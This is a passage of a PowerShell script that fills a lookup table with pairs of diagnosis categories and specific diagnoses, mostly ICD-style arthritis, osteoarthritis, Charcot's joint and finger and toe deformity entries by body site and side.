elbow","Traumatic arthropathy, right elbow") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, elbow","Traumatic arthropathy, left elbow") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, elbow","Traumatic arthropathy, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, wrist","Traumatic arthropathy, right wrist") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, wrist","Traumatic arthropathy, left wrist") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, wrist","Traumatic arthropathy, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, hand","Traumatic arthropathy, right hand") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, hand","Traumatic arthropathy, left hand") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, hand","Traumatic arthropathy, unspecified hand") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, hip","Traumatic arthropathy, right hip") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, hip","Traumatic arthropathy, left hip") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, hip","Traumatic arthropathy, unspecified hip") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, knee","Traumatic arthropathy, right knee") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, knee","Traumatic arthropathy, left knee") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, knee","Traumatic arthropathy, unspecified knee") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, ankle and foot","Traumatic arthropathy, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, ankle and foot","Traumatic arthropathy, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, ankle and foot","Traumatic arthropathy, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, other specified site","Traumatic arthropathy, other specified site") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, multiple sites","Traumatic arthropathy, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified","Other specific arthropathies, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, shoulder","Other specific arthropathies, not elsewhere classified, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, shoulder","Other specific arthropathies, not elsewhere classified, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, shoulder","Other specific arthropathies, not elsewhere classified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, elbow","Other specific arthropathies, not elsewhere classified, right elbow") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, elbow","Other specific arthropathies, not elsewhere classified, left elbow") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, elbow","Other specific arthropathies, not elsewhere classified, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, wrist","Other specific arthropathies, not elsewhere classified, right wrist") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, wrist","Other specific arthropathies, not elsewhere classified, left wrist") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, wrist","Other specific arthropathies, not elsewhere classified, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, hand","Other specific arthropathies, not elsewhere classified, right hand") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, hand","Other specific arthropathies, not elsewhere classified, left hand") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, hand","Other specific arthropathies, not elsewhere classified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, hip","Other specific arthropathies, not elsewhere classified, right hip") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, hip","Other specific arthropathies, not elsewhere classified, left hip") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, hip","Other specific arthropathies, not elsewhere classified, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, knee","Other specific arthropathies, not elsewhere classified, right knee") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, knee","Other specific arthropathies, not elsewhere classified, left knee") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, knee","Other specific arthropathies, not elsewhere classified, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, ankle and foot","Other specific arthropathies, not elsewhere classified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, ankle and foot","Other specific arthropathies, not elsewhere classified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, ankle and foot","Other specific arthropathies, not elsewhere classified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, other specified site","Other specific arthropathies, not elsewhere classified, other specified site") + $null = $DiagnosisList.Rows.Add("Other specific arthropathies, not elsewhere classified, multiple sites","Other specific arthropathies, not elsewhere classified, multiple sites") + $null = $DiagnosisList.Rows.Add("Arthropathy, unspecified","Arthropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Other arthritis","Polyarthritis, unspecified") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified","Monoarthritis, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, shoulder","Monoarthritis, not elsewhere classified, right shoulder") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, shoulder","Monoarthritis, not elsewhere classified, left shoulder") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, shoulder","Monoarthritis, not elsewhere classified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, elbow","Monoarthritis, not elsewhere classified, right elbow") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, elbow","Monoarthritis, not elsewhere classified, left elbow") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, elbow","Monoarthritis, not elsewhere classified, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, wrist","Monoarthritis, not elsewhere classified, right wrist") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, wrist","Monoarthritis, not elsewhere classified, left wrist") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, wrist","Monoarthritis, not elsewhere classified, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, hand","Monoarthritis, not elsewhere classified, right hand") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, hand","Monoarthritis, not elsewhere classified, left hand") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, hand","Monoarthritis, not elsewhere classified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, hip","Monoarthritis, not elsewhere classified, right hip") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, hip","Monoarthritis, not elsewhere classified, left hip") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, hip","Monoarthritis, not elsewhere classified, unspecified hip") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, knee","Monoarthritis, not elsewhere classified, right knee") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, knee","Monoarthritis, not elsewhere classified, left knee") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, knee","Monoarthritis, not elsewhere classified, unspecified knee") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, ankle and foot","Monoarthritis, not elsewhere classified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, ankle and foot","Monoarthritis, not elsewhere classified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Monoarthritis, not elsewhere classified, ankle and foot","Monoarthritis, not elsewhere classified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified arthritis","Other specified arthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, shoulder","Other specified arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, shoulder","Other specified arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, shoulder","Other specified arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, elbow","Other specified arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, elbow","Other specified arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, elbow","Other specified arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, wrist","Other specified arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, wrist","Other specified arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, wrist","Other specified arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, hand","Other specified arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, hand","Other specified arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, hand","Other specified arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, hip","Other specified arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, hip","Other specified arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, hip","Other specified arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, knee","Other specified arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, knee","Other specified arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, knee","Other specified arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, ankle and foot","Other specified arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, ankle and foot","Other specified arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, ankle and foot","Other specified arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, other site","Other specified arthritis, other site") + $null = $DiagnosisList.Rows.Add("Other specified arthritis, multiple sites","Other specified arthritis, multiple sites") + $null = $DiagnosisList.Rows.Add("Charcot's joint","Charcot's joint, unspecified site") + $null = $DiagnosisList.Rows.Add("Charcot's joint, shoulder","Charcot's joint, right shoulder") + $null = $DiagnosisList.Rows.Add("Charcot's joint, shoulder","Charcot's joint, left shoulder") + $null = $DiagnosisList.Rows.Add("Charcot's joint, shoulder","Charcot's joint, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Charcot's joint, elbow","Charcot's joint, right elbow") + $null = $DiagnosisList.Rows.Add("Charcot's joint, elbow","Charcot's joint, left elbow") + $null = $DiagnosisList.Rows.Add("Charcot's joint, elbow","Charcot's joint, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Charcot's joint, wrist","Charcot's joint, right wrist") + $null = $DiagnosisList.Rows.Add("Charcot's joint, wrist","Charcot's joint, left wrist") + $null = $DiagnosisList.Rows.Add("Charcot's joint, wrist","Charcot's joint, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Charcot's joint, hand","Charcot's joint, right hand") + $null = $DiagnosisList.Rows.Add("Charcot's joint, hand","Charcot's joint, left hand") + $null = $DiagnosisList.Rows.Add("Charcot's joint, hand","Charcot's joint, unspecified hand") + $null = $DiagnosisList.Rows.Add("Charcot's joint, hip","Charcot's joint, right hip") + $null = $DiagnosisList.Rows.Add("Charcot's joint, hip","Charcot's joint, left hip") + $null = $DiagnosisList.Rows.Add("Charcot's joint, hip","Charcot's joint, unspecified hip") + $null = $DiagnosisList.Rows.Add("Charcot's joint, knee","Charcot's joint, right knee") + $null = $DiagnosisList.Rows.Add("Charcot's joint, knee","Charcot's joint, left knee") + $null = $DiagnosisList.Rows.Add("Charcot's joint, knee","Charcot's joint, unspecified knee") + $null = $DiagnosisList.Rows.Add("Charcot's joint, ankle and foot","Charcot's joint, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Charcot's joint, ankle and foot","Charcot's joint, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Charcot's joint, ankle and foot","Charcot's joint, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Charcot's joint, vertebrae","Charcot's joint, vertebrae") + $null = $DiagnosisList.Rows.Add("Charcot's joint, multiple sites","Charcot's joint, multiple sites") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere","Arthropathies in other specified diseases classified elsewhere, unspecified site") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, shoulder","Arthropathies in other specified diseases classified elsewhere, right shoulder") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, shoulder","Arthropathies in other specified diseases classified elsewhere, left shoulder") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, shoulder","Arthropathies in other specified diseases classified elsewhere, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, elbow","Arthropathies in other specified diseases classified elsewhere, right elbow") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, elbow","Arthropathies in other specified diseases classified elsewhere, left elbow") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, elbow","Arthropathies in other specified diseases classified elsewhere, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, wrist","Arthropathies in other specified diseases classified elsewhere, right wrist") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, wrist","Arthropathies in other specified diseases classified elsewhere, left wrist") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, wrist","Arthropathies in other specified diseases classified elsewhere, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, hand","Arthropathies in other specified diseases classified elsewhere, right hand") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, hand","Arthropathies in other specified diseases classified elsewhere, left hand") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, hand","Arthropathies in other specified diseases classified elsewhere, unspecified hand") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, hip","Arthropathies in other specified diseases classified elsewhere, right hip") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, hip","Arthropathies in other specified diseases classified elsewhere, left hip") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, hip","Arthropathies in other specified diseases classified elsewhere, unspecified hip") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, knee","Arthropathies in other specified diseases classified elsewhere, right knee") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, knee","Arthropathies in other specified diseases classified elsewhere, left knee") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, knee","Arthropathies in other specified diseases classified elsewhere, unspecified knee") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, ankle and foot","Arthropathies in other specified diseases classified elsewhere, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, ankle and foot","Arthropathies in other specified diseases classified elsewhere, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, ankle and foot","Arthropathies in other specified diseases classified elsewhere, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, vertebrae","Arthropathies in other specified diseases classified elsewhere, vertebrae") + $null = $DiagnosisList.Rows.Add("Arthropathies in other specified diseases classified elsewhere, multiple sites","Arthropathies in other specified diseases classified elsewhere, multiple sites") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Primary generalized (osteo)arthritis") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Heberden's nodes (with arthropathy)") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Bouchard's nodes (with arthropathy)") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Secondary multiple arthritis") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Erosive (osteo)arthritis") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Other polyosteoarthritis") + $null = $DiagnosisList.Rows.Add("Polyosteoarthritis","Polyosteoarthritis, unspecified") + $null = $DiagnosisList.Rows.Add("Osteoarthritis of hip","Bilateral primary osteoarthritis of hip") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of hip","Unilateral primary osteoarthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of hip","Unilateral primary osteoarthritis, right hip") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of hip","Unilateral primary osteoarthritis, left hip") + $null = $DiagnosisList.Rows.Add("Bilateral osteoarthritis resulting from hip dysplasia","Bilateral osteoarthritis resulting from hip dysplasia") + $null = $DiagnosisList.Rows.Add("Unilateral osteoarthritis resulting from hip dysplasia","Unilateral osteoarthritis resulting from hip dysplasia, unspecified hip") + $null = $DiagnosisList.Rows.Add("Unilateral osteoarthritis resulting from hip dysplasia","Unilateral osteoarthritis resulting from hip dysplasia, right hip") + $null = $DiagnosisList.Rows.Add("Unilateral osteoarthritis resulting from hip dysplasia","Unilateral osteoarthritis resulting from hip dysplasia, left hip") + $null = $DiagnosisList.Rows.Add("Bilateral post-traumatic osteoarthritis of hip","Bilateral post-traumatic osteoarthritis of hip") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of hip","Unilateral post-traumatic osteoarthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of hip","Unilateral post-traumatic osteoarthritis, right hip") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of hip","Unilateral post-traumatic osteoarthritis, left hip") + $null = $DiagnosisList.Rows.Add("Other bilateral secondary osteoarthritis of hip","Other bilateral secondary osteoarthritis of hip") + $null = $DiagnosisList.Rows.Add("Other unilateral secondary osteoarthritis of hip","Other unilateral secondary osteoarthritis of hip") + $null = $DiagnosisList.Rows.Add("Osteoarthritis of hip, unspecified","Osteoarthritis of hip, unspecified") + $null = $DiagnosisList.Rows.Add("Osteoarthritis of knee","Bilateral primary osteoarthritis of knee") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of knee","Unilateral primary osteoarthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of knee","Unilateral primary osteoarthritis, right knee") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of knee","Unilateral primary osteoarthritis, left knee") + $null = $DiagnosisList.Rows.Add("Bilateral post-traumatic osteoarthritis of knee","Bilateral post-traumatic osteoarthritis of knee") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of knee","Unilateral post-traumatic osteoarthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of knee","Unilateral post-traumatic osteoarthritis, right knee") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of knee","Unilateral post-traumatic osteoarthritis, left knee") + $null = $DiagnosisList.Rows.Add("Other bilateral secondary osteoarthritis of knee","Other bilateral secondary osteoarthritis of knee") + $null = $DiagnosisList.Rows.Add("Other unilateral secondary osteoarthritis of knee","Other unilateral secondary osteoarthritis of knee") + $null = $DiagnosisList.Rows.Add("Osteoarthritis of knee, unspecified","Osteoarthritis of knee, unspecified") + $null = $DiagnosisList.Rows.Add("Osteoarthritis of first carpometacarpal joint","Bilateral primary osteoarthritis of first carpometacarpal joints") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of first carpometacarpal joint","Unilateral primary osteoarthritis of first carpometacarpal joint, unspecified hand") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of first carpometacarpal joint","Unilateral primary osteoarthritis of first carpometacarpal joint, right hand") + $null = $DiagnosisList.Rows.Add("Unilateral primary osteoarthritis of first carpometacarpal joint","Unilateral primary osteoarthritis of first carpometacarpal joint, left hand") + $null = $DiagnosisList.Rows.Add("Bilateral post-traumatic osteoarthritis of first carpometacarpal joints","Bilateral post-traumatic osteoarthritis of first carpometacarpal joints") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of first carpometacarpal joint","Unilateral post-traumatic osteoarthritis of first carpometacarpal joint, unspecified hand") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of first carpometacarpal joint","Unilateral post-traumatic osteoarthritis of first carpometacarpal joint, right hand") + $null = $DiagnosisList.Rows.Add("Unilateral post-traumatic osteoarthritis of first carpometacarpal joint","Unilateral post-traumatic osteoarthritis of first carpometacarpal joint, left hand") + $null = $DiagnosisList.Rows.Add("Other bilateral secondary osteoarthritis of first carpometacarpal joints","Other bilateral secondary osteoarthritis of first carpometacarpal joints") + $null = $DiagnosisList.Rows.Add("Other unilateral secondary osteoarthritis of first carpometacarpal joint","Other unilateral secondary osteoarthritis of first carpometacarpal joint, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other unilateral secondary osteoarthritis of first carpometacarpal joint","Other unilateral secondary osteoarthritis of first carpometacarpal joint, right hand") + $null = $DiagnosisList.Rows.Add("Other unilateral secondary osteoarthritis of first carpometacarpal joint","Other unilateral secondary osteoarthritis of first carpometacarpal joint, left hand") + $null = $DiagnosisList.Rows.Add("Osteoarthritis of first carpometacarpal joint, unspecified","Osteoarthritis of first carpometacarpal joint, unspecified") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, shoulder","Primary osteoarthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, shoulder","Primary osteoarthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, shoulder","Primary osteoarthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, elbow","Primary osteoarthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, elbow","Primary osteoarthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, elbow","Primary osteoarthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, wrist","Primary osteoarthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, wrist","Primary osteoarthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, wrist","Primary osteoarthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, hand","Primary osteoarthritis, right hand") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, hand","Primary osteoarthritis, left hand") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis, hand","Primary osteoarthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis ankle and foot","Primary osteoarthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis ankle and foot","Primary osteoarthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Primary osteoarthritis ankle and foot","Primary osteoarthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, shoulder","Post-traumatic osteoarthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, shoulder","Post-traumatic osteoarthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, shoulder","Post-traumatic osteoarthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, elbow","Post-traumatic osteoarthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, elbow","Post-traumatic osteoarthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, elbow","Post-traumatic osteoarthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, wrist","Post-traumatic osteoarthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, wrist","Post-traumatic osteoarthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, wrist","Post-traumatic osteoarthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, hand","Post-traumatic osteoarthritis, right hand") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, hand","Post-traumatic osteoarthritis, left hand") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, hand","Post-traumatic osteoarthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, ankle and foot","Post-traumatic osteoarthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, ankle and foot","Post-traumatic osteoarthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Post-traumatic osteoarthritis, ankle and foot","Post-traumatic osteoarthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, shoulder","Secondary osteoarthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, shoulder","Secondary osteoarthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, shoulder","Secondary osteoarthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, elbow","Secondary osteoarthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, elbow","Secondary osteoarthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, elbow","Secondary osteoarthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, wrist","Secondary osteoarthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, wrist","Secondary osteoarthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, wrist","Secondary osteoarthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, hand","Secondary osteoarthritis, right hand") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, hand","Secondary osteoarthritis, left hand") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, hand","Secondary osteoarthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, ankle and foot","Secondary osteoarthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, ankle and foot","Secondary osteoarthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Secondary osteoarthritis, ankle and foot","Secondary osteoarthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteoarthritis, unspecified site","Unspecified osteoarthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteoarthritis, unspecified site","Primary osteoarthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteoarthritis, unspecified site","Post-traumatic osteoarthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteoarthritis, unspecified site","Secondary osteoarthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Unspecified deformity of finger(s)","Unspecified deformity of right finger(s)") + $null = $DiagnosisList.Rows.Add("Unspecified deformity of finger(s)","Unspecified deformity of left finger(s)") + $null = $DiagnosisList.Rows.Add("Unspecified deformity of finger(s)","Unspecified deformity of unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Mallet finger","Mallet finger of right finger(s)") + $null = $DiagnosisList.Rows.Add("Mallet finger","Mallet finger of left finger(s)") + $null = $DiagnosisList.Rows.Add("Mallet finger","Mallet finger of unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Boutonniere deformity","Boutonniere deformity of right finger(s)") + $null = $DiagnosisList.Rows.Add("Boutonniere deformity","Boutonniere deformity of left finger(s)") + $null = $DiagnosisList.Rows.Add("Boutonniere deformity","Boutonniere deformity of unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Swan-neck deformity","Swan-neck deformity of right finger(s)") + $null = $DiagnosisList.Rows.Add("Swan-neck deformity","Swan-neck deformity of left finger(s)") + $null = $DiagnosisList.Rows.Add("Swan-neck deformity","Swan-neck deformity of unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Other deformity of finger(s)","Other deformity of right finger(s)") + $null = $DiagnosisList.Rows.Add("Other deformity of finger(s)","Other deformity of left finger(s)") + $null = $DiagnosisList.Rows.Add("Other deformity of finger(s)","Other deformity of finger(s), unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Hallux valgus (acquired)","Hallux valgus (acquired), unspecified foot") + $null = $DiagnosisList.Rows.Add("Hallux valgus (acquired)","Hallux valgus (acquired), right foot") + $null = $DiagnosisList.Rows.Add("Hallux valgus (acquired)","Hallux valgus (acquired), left foot") + $null = $DiagnosisList.Rows.Add("Hallux rigidus","Hallux rigidus, unspecified foot") + $null = $DiagnosisList.Rows.Add("Hallux rigidus","Hallux rigidus, right foot") + $null = $DiagnosisList.Rows.Add("Hallux rigidus","Hallux rigidus, left foot") + $null = $DiagnosisList.Rows.Add("Hallux varus (acquired)","Hallux varus (acquired), unspecified foot") + $null = $DiagnosisList.Rows.Add("Hallux varus (acquired)","Hallux varus (acquired), right foot") + $null = $DiagnosisList.Rows.Add("Hallux varus (acquired)","Hallux varus (acquired), left foot") + $null = 